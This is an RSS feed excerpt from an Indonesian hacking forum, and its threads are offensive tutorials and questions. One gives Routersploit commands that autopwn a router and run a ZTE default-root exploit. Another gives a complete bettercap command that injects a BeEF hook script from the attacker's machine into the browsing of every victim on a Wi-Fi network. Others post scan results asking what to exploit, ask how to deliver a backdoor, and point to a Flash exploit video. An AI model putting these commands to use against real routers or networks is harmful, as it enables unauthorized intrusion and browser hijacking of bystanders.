			<title><![CDATA[Duet maut bettercap dan Metasploit vs Windows 7]]></title>
			<link>https://www.backboxindonesia.or.id/thread-154.html</link>
			<pubDate>Thu, 28 Jul 2016 11:44:48 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-154.html</guid>
			<description><![CDATA[Bug adobe flash player yang terkenal dilakuin oleh "hacking team" taun 2015 lalu menyisakan ratusan GB data sensitif di internet.<br />
Dan ane MUNGKIN berhasil nyari tau gimana cara mereka manfaatin celah adobe flash saat itu<br />
berikut tutorial ane, pake 720p biar jelas dan ane dengan senantiasa buat berdiskusi dimari<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z5okYRCW1sU" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<div style="text-align: left;" class="mycode_align">
sumber: <a href="http://arstechnica.com/security/2015/07/how-a-russian-hacker-made-45000-selling-a-zero-day-flash-exploit-to-hacking-team/" target="_blank" class="mycode_url">http://arstechnica.com/security/2015/07/...king-team/</a></div></div>]]></description>
			<content:encoded><![CDATA[Bug adobe flash player yang terkenal dilakuin oleh "hacking team" taun 2015 lalu menyisakan ratusan GB data sensitif di internet.<br />
Dan ane MUNGKIN berhasil nyari tau gimana cara mereka manfaatin celah adobe flash saat itu<br />
berikut tutorial ane, pake 720p biar jelas dan ane dengan senantiasa buat berdiskusi dimari<br />
<br />
<div style="text-align: center;" class="mycode_align"><!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/z5okYRCW1sU" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<div style="text-align: left;" class="mycode_align">
sumber: <a href="http://arstechnica.com/security/2015/07/how-a-russian-hacker-made-45000-selling-a-zero-day-flash-exploit-to-hacking-team/" target="_blank" class="mycode_url">http://arstechnica.com/security/2015/07/...king-team/</a></div></div>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[ASK] Mau bertanya ttng nmap]]></title>
			<link>https://www.backboxindonesia.or.id/thread-151.html</link>
			<pubDate>Wed, 20 Jul 2016 15:09:23 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-151.html</guid>
			<description><![CDATA[Nmap scan report for 10.10.14.79<br />
 Host is up (0.00041s latency).<br />
Not shown: 995 filtered ports<br />
PORT      STATE SERVICE<br />
135/tcp   open  msrpc<br />
139/tcp   open  netbios-ssn<br />
445/tcp   open  microsoft-ds<br />
7741/tcp  open  scriptview<br />
49156/tcp open  unknown<br />
MAC Address: 98:83:89<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/12.png" alt="12" title="12" class="smilie smilie_43" />06:5C (Samsung Electronics)<br />
<br />
Nmap scan report for 10.10.14.82<br />
Host is up (0.00044s latency).<br />
Not shown: 992 filtered ports<br />
PORT     STATE SERVICE<br />
80/tcp   open  http<br />
135/tcp  open  msrpc<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds<br />
1801/tcp open  msmq<br />
2103/tcp open  zephyr-clt<br />
2105/tcp open  eklogin<br />
2107/tcp open  msmq-mgmt<br />
MAC Address: 00<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/24.png" alt="24" title="24" class="smilie smilie_28" />54:61:BA:0F (Samsung Electronics)<br />
<br />
Nmap scan report for 10.10.14.92<br />
Host is up (0.00031s latency).<br />
Not shown: 992 filtered ports<br />
PORT     STATE SERVICE<br />
80/tcp   open  http<br />
135/tcp  open  msrpc<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds<br />
1801/tcp open  msmq<br />
2103/tcp open  zephyr-clt<br />
2105/tcp open  eklogin<br />
2107/tcp open  msmq-mgmt<br />
MAC Address: 20:89:84:F4:64:1A (Compal Information (kunshan))<br />
<br />
Nmap scan report for 10.10.14.96<br />
Host is up (0.00024s latency).<br />
All 1000 scanned ports on 10.10.14.96 are closed<br />
MAC Address: 08:62:66<img src="http://www.indonesianbacktrack.or.id/forum/images/smilies/biggrin.png" alt="[Image: biggrin.png]" class="mycode_img" />C:B4:3E (Asustek Computer)<br />
<br />
Nmap scan report for 10.10.14.16<br />
Host is up (0.000014s latency).<br />
Not shown: 997 closed ports<br />
PORT    STATE SERVICE<br />
111/tcp open  rpcbind<br />
139/tcp open  netbios-ssn<br />
445/tcp open  microsoft-ds<br />
<br />
maaf ane baru belajar nmap <br />
dari port2 di atas ada yang bisa di exploitasi ?<br />
kalo ada yang bisa di exploitasi tolong di jelasin]]></description>
			<content:encoded><![CDATA[Nmap scan report for 10.10.14.79<br />
 Host is up (0.00041s latency).<br />
Not shown: 995 filtered ports<br />
PORT      STATE SERVICE<br />
135/tcp   open  msrpc<br />
139/tcp   open  netbios-ssn<br />
445/tcp   open  microsoft-ds<br />
7741/tcp  open  scriptview<br />
49156/tcp open  unknown<br />
MAC Address: 98:83:89<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/12.png" alt="12" title="12" class="smilie smilie_43" />06:5C (Samsung Electronics)<br />
<br />
Nmap scan report for 10.10.14.82<br />
Host is up (0.00044s latency).<br />
Not shown: 992 filtered ports<br />
PORT     STATE SERVICE<br />
80/tcp   open  http<br />
135/tcp  open  msrpc<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds<br />
1801/tcp open  msmq<br />
2103/tcp open  zephyr-clt<br />
2105/tcp open  eklogin<br />
2107/tcp open  msmq-mgmt<br />
MAC Address: 00<img src="https://www.backboxindonesia.or.id/images/backbox/smilies/24.png" alt="24" title="24" class="smilie smilie_28" />54:61:BA:0F (Samsung Electronics)<br />
<br />
Nmap scan report for 10.10.14.92<br />
Host is up (0.00031s latency).<br />
Not shown: 992 filtered ports<br />
PORT     STATE SERVICE<br />
80/tcp   open  http<br />
135/tcp  open  msrpc<br />
139/tcp  open  netbios-ssn<br />
445/tcp  open  microsoft-ds<br />
1801/tcp open  msmq<br />
2103/tcp open  zephyr-clt<br />
2105/tcp open  eklogin<br />
2107/tcp open  msmq-mgmt<br />
MAC Address: 20:89:84:F4:64:1A (Compal Information (kunshan))<br />
<br />
Nmap scan report for 10.10.14.96<br />
Host is up (0.00024s latency).<br />
All 1000 scanned ports on 10.10.14.96 are closed<br />
MAC Address: 08:62:66<img src="http://www.indonesianbacktrack.or.id/forum/images/smilies/biggrin.png" alt="[Image: biggrin.png]" class="mycode_img" />C:B4:3E (Asustek Computer)<br />
<br />
Nmap scan report for 10.10.14.16<br />
Host is up (0.000014s latency).<br />
Not shown: 997 closed ports<br />
PORT    STATE SERVICE<br />
111/tcp open  rpcbind<br />
139/tcp open  netbios-ssn<br />
445/tcp open  microsoft-ds<br />
<br />
maaf ane baru belajar nmap <br />
dari port2 di atas ada yang bisa di exploitasi ?<br />
kalo ada yang bisa di exploitasi tolong di jelasin]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Nganu Router make Routersploit ala newbi kelas teri]]></title>
			<link>https://www.backboxindonesia.or.id/thread-134.html</link>
			<pubDate>Sun, 29 May 2016 09:35:32 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-134.html</guid>
			<description><![CDATA[Hello para stahku sekalian :D  <br />
  Kali ini Newbie kelas teri bakalan ngasih sedikit materi :P  Semoga bermanfaat dan gak TS Gak jadi bahan bully :v <br />
<br />
 Okeh, kali ini ane mau bawain materi tentang Routersploit. Pasti para stahku udah tau :D <br />
<br />
 Okeh gausah panjang lebar kali tinggi :D langsung ke KTP :* <br />
<br />
<br />
pastikan routersploit udah terinstall di tempat ente :v <br />
kalau belum, bisa ke link  :   <a href="https://github.com/reverse-shell/routersploit" target="_blank" class="mycode_url">https://github.com/reverse-shell/routersploit</a> <br />
<br />
kalau udah terinstall ketik "cd routersploit" (tanpa tanda petik)<br />
<br />
<br />
<br />
setelah itu ketikan lagi ./rsf.py<br />
<br />
<a href="https://imageshack.com/i/pnTdEkHZp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/923/TdEkHZ.png" alt="[Image: TdEkHZ.png]" class="mycode_img" /></a><br />
<br />
 okeh, setelah itu kita ketik "use scanners/autopwn" lalu enter.<br />
<br />
<a href="https://imageshack.com/i/powBd89lp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/924/wBd89l.png" alt="[Image: wBd89l.png]" class="mycode_img" /></a><br />
<br />
 terus "show options" untuk ngelihat anunya :v <br />
<br />
 kalau udah, langsung kita "set target 192.168.1.1" itu ip router ane :v <br />
<br />
  <br />
<br />
 terus kalau udah "run" . tunggu sampai nemuin exploitnya :v<br />
<br />
 <a href="https://imageshack.com/i/pmjnSDbxp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/922/jnSDbx.png" alt="[Image: jnSDbx.png]" class="mycode_img" /></a>  <br />
 nah itu udah kelihatan, langsung ajah "use exploits/zte/f6xx_default_root"<br />
<br />
 <a href="https://imageshack.com/i/pmch3MhMp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/922/ch3MhM.png" alt="[Image: ch3MhM.png]" class="mycode_img" /></a>  <br />
 okeh :v , terus "set target 192.168.1.1" langsung "run"<br />
<br />
 <a href="https://imageshack.com/i/pnyOennep" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/923/yOenne.png" alt="[Image: yOenne.png]" class="mycode_img" /></a><br />
<br />
  dan akhirnya <br />
 <br />
<a href="https://imageshack.com/i/pleSIJd4p" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/921/eSIJd4.png" alt="[Image: eSIJd4.png]" class="mycode_img" /></a><br />
<br />
tara :v <br />
<br />
<br />
<br />
 Okeh, cukup sekian Materi dari Newbi kelas TERI, mungkin ini bukanlah apa-apa :v tapi percayalah, hatimu padaku, bila kau inginkan aku akan selalu menjagamu :* *lah malah nyanyi* :3 <br />
<br />
 okeh sekian dan terimakasih.<br />
<br />
 --Thanks to BackBox Medan Team--]]></description>
			<content:encoded><![CDATA[Hello para stahku sekalian :D  <br />
  Kali ini Newbie kelas teri bakalan ngasih sedikit materi :P  Semoga bermanfaat dan gak TS Gak jadi bahan bully :v <br />
<br />
 Okeh, kali ini ane mau bawain materi tentang Routersploit. Pasti para stahku udah tau :D <br />
<br />
 Okeh gausah panjang lebar kali tinggi :D langsung ke KTP :* <br />
<br />
<br />
pastikan routersploit udah terinstall di tempat ente :v <br />
kalau belum, bisa ke link  :   <a href="https://github.com/reverse-shell/routersploit" target="_blank" class="mycode_url">https://github.com/reverse-shell/routersploit</a> <br />
<br />
kalau udah terinstall ketik "cd routersploit" (tanpa tanda petik)<br />
<br />
<br />
<br />
setelah itu ketikan lagi ./rsf.py<br />
<br />
<a href="https://imageshack.com/i/pnTdEkHZp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/923/TdEkHZ.png" alt="[Image: TdEkHZ.png]" class="mycode_img" /></a><br />
<br />
 okeh, setelah itu kita ketik "use scanners/autopwn" lalu enter.<br />
<br />
<a href="https://imageshack.com/i/powBd89lp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/924/wBd89l.png" alt="[Image: wBd89l.png]" class="mycode_img" /></a><br />
<br />
 terus "show options" untuk ngelihat anunya :v <br />
<br />
 kalau udah, langsung kita "set target 192.168.1.1" itu ip router ane :v <br />
<br />
  <br />
<br />
 terus kalau udah "run" . tunggu sampai nemuin exploitnya :v<br />
<br />
 <a href="https://imageshack.com/i/pmjnSDbxp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/922/jnSDbx.png" alt="[Image: jnSDbx.png]" class="mycode_img" /></a>  <br />
 nah itu udah kelihatan, langsung ajah "use exploits/zte/f6xx_default_root"<br />
<br />
 <a href="https://imageshack.com/i/pmch3MhMp" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/922/ch3MhM.png" alt="[Image: ch3MhM.png]" class="mycode_img" /></a>  <br />
 okeh :v , terus "set target 192.168.1.1" langsung "run"<br />
<br />
 <a href="https://imageshack.com/i/pnyOennep" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/923/yOenne.png" alt="[Image: yOenne.png]" class="mycode_img" /></a><br />
<br />
  dan akhirnya <br />
 <br />
<a href="https://imageshack.com/i/pleSIJd4p" target="_blank" class="mycode_url"><img src="http://imagizer.imageshack.us/v2/xq90/921/eSIJd4.png" alt="[Image: eSIJd4.png]" class="mycode_img" /></a><br />
<br />
tara :v <br />
<br />
<br />
<br />
 Okeh, cukup sekian Materi dari Newbi kelas TERI, mungkin ini bukanlah apa-apa :v tapi percayalah, hatimu padaku, bila kau inginkan aku akan selalu menjagamu :* *lah malah nyanyi* :3 <br />
<br />
 okeh sekian dan terimakasih.<br />
<br />
 --Thanks to BackBox Medan Team--]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[[Tanya] Gimana sih Cara mastah kirim backdoor ?]]></title>
			<link>https://www.backboxindonesia.or.id/thread-130.html</link>
			<pubDate>Sun, 22 May 2016 20:23:20 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-130.html</guid>
			<description><![CDATA[Dear para mastah  :D  Gimana sih cara kalian kirim backdoor ketarget tanpa main fisik :v  :D Newbi bertanya, mohon dijawab :D makasih stah :D]]></description>
			<content:encoded><![CDATA[Dear para mastah  :D  Gimana sih cara kalian kirim backdoor ketarget tanpa main fisik :v  :D Newbi bertanya, mohon dijawab :D makasih stah :D]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[How I RickRoll "Bokeper" For Fun]]></title>
			<link>https://www.backboxindonesia.or.id/thread-120.html</link>
			<pubDate>Fri, 06 May 2016 06:42:17 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-120.html</guid>
			<description><![CDATA[hey hey hey sup guys, <a href="https://www.facebook.com/dot.slash.IMP" target="_blank" class="mycode_url">sup_dawg</a> in the house<br />
baru aja tadi pagi ane bikin tutorial <a href="http://www.backboxindonesia.or.id/thread-119-post-698.html" target="_blank" class="mycode_url">dimari.</a><br />
Beda dengan sebelumnya kali ini kita ga main evil twin dulu ya guys karena pas ane liat udah ada yang bikin tutorial sniffing bettercap, jadi ane skip soal hsts bypass dan loncat ke penggunaan bettercap dengan module proxy-module dengan submodul injectjs.<br />
<br />
Ok dalem tutorial ini ane harep yang baca paling ngga udah ngerti sedikit gimana cara pake bettercap dan beef, or kalian bisa diskusi via fb *karena ane lebih sering muncul di fb, maksudnya biar fast respond. Let's get started,<br />
<br />
seperti pada umumnya yang kalian harus lakuin adalah konek ke wifi target, trus aktifin beef-xss, login beef, dan jalankan bettercap<br />
<br />
command yang ane pake di bettercap adalah:<br />
<span style="font-weight: bold;" class="mycode_b">bettercap -I wlan0 --proxy --proxy-module injectjs --js-url http://&lt;ip kalian&gt;:3000/hook.js -X -P POST -T &lt;target kalian atau jangan pake -T biar 1 network kena&gt;</span><br />
<br />
<img src="http://i.imgur.com/Q1LYZO0.png" alt="[Image: Q1LYZO0.png]" class="mycode_img" /><br />
<br />
after that yang kita lakuin ada menunggu sampe korban browsing dan muncul di tab sebelah kiri beef<br />
<img src="http://i.imgur.com/Ivp855c.png" alt="[Image: Ivp855c.png]" class="mycode_img" /><br />
<br />
see the page url? lol fotobugilsiana.com (padahal gw sendiri yang buka di laptop target), langkah selanjutnya kita bisa ke tab command dan bisa ngelakuin apa aja yang ada disana, disini ane coba redirect rickroll dan hasilnya di laptop target redirect ke sebuah video klip yang lagunya enak gila didenger<br />
<br />
<img src="http://i.imgur.com/wUKo8TE.png" alt="[Image: wUKo8TE.png]" class="mycode_img" /><br />
<br />
Ok what we got here? ternyata gw demen bokep(loh), salah ding wkwkwk ternyata BeEF bisa dipake tanpa soceng dan ya ini cuma contoh kecil, dan sedikit spoiler biar kalian semangat risetnya tutorial bettercap + beef ini bisa digabung dengan tutorial evil twin yang ane buat wuahahaha macam robot power ranger digabung gabung.<br />
tapi ini cuma untuk pembelajaran, jauhi bokep, jauhi narkoba, dekatkan diri dengan janda (loh).<br />
stay calm, stay rickrolled!]]></description>
			<content:encoded><![CDATA[hey hey hey sup guys, <a href="https://www.facebook.com/dot.slash.IMP" target="_blank" class="mycode_url">sup_dawg</a> in the house<br />
baru aja tadi pagi ane bikin tutorial <a href="http://www.backboxindonesia.or.id/thread-119-post-698.html" target="_blank" class="mycode_url">dimari.</a><br />
Beda dengan sebelumnya kali ini kita ga main evil twin dulu ya guys karena pas ane liat udah ada yang bikin tutorial sniffing bettercap, jadi ane skip soal hsts bypass dan loncat ke penggunaan bettercap dengan module proxy-module dengan submodul injectjs.<br />
<br />
Ok dalem tutorial ini ane harep yang baca paling ngga udah ngerti sedikit gimana cara pake bettercap dan beef, or kalian bisa diskusi via fb *karena ane lebih sering muncul di fb, maksudnya biar fast respond. Let's get started,<br />
<br />
seperti pada umumnya yang kalian harus lakuin adalah konek ke wifi target, trus aktifin beef-xss, login beef, dan jalankan bettercap<br />
<br />
command yang ane pake di bettercap adalah:<br />
<span style="font-weight: bold;" class="mycode_b">bettercap -I wlan0 --proxy --proxy-module injectjs --js-url http://&lt;ip kalian&gt;:3000/hook.js -X -P POST -T &lt;target kalian atau jangan pake -T biar 1 network kena&gt;</span><br />
<br />
<img src="http://i.imgur.com/Q1LYZO0.png" alt="[Image: Q1LYZO0.png]" class="mycode_img" /><br />
<br />
after that yang kita lakuin ada menunggu sampe korban browsing dan muncul di tab sebelah kiri beef<br />
<img src="http://i.imgur.com/Ivp855c.png" alt="[Image: Ivp855c.png]" class="mycode_img" /><br />
<br />
see the page url? lol fotobugilsiana.com (padahal gw sendiri yang buka di laptop target), langkah selanjutnya kita bisa ke tab command dan bisa ngelakuin apa aja yang ada disana, disini ane coba redirect rickroll dan hasilnya di laptop target redirect ke sebuah video klip yang lagunya enak gila didenger<br />
<br />
<img src="http://i.imgur.com/wUKo8TE.png" alt="[Image: wUKo8TE.png]" class="mycode_img" /><br />
<br />
Ok what we got here? ternyata gw demen bokep(loh), salah ding wkwkwk ternyata BeEF bisa dipake tanpa soceng dan ya ini cuma contoh kecil, dan sedikit spoiler biar kalian semangat risetnya tutorial bettercap + beef ini bisa digabung dengan tutorial evil twin yang ane buat wuahahaha macam robot power ranger digabung gabung.<br />
tapi ini cuma untuk pembelajaran, jauhi bokep, jauhi narkoba, dekatkan diri dengan janda (loh).<br />
stay calm, stay rickrolled!]]></content:encoded>
		</item>
	</channel>
</rss>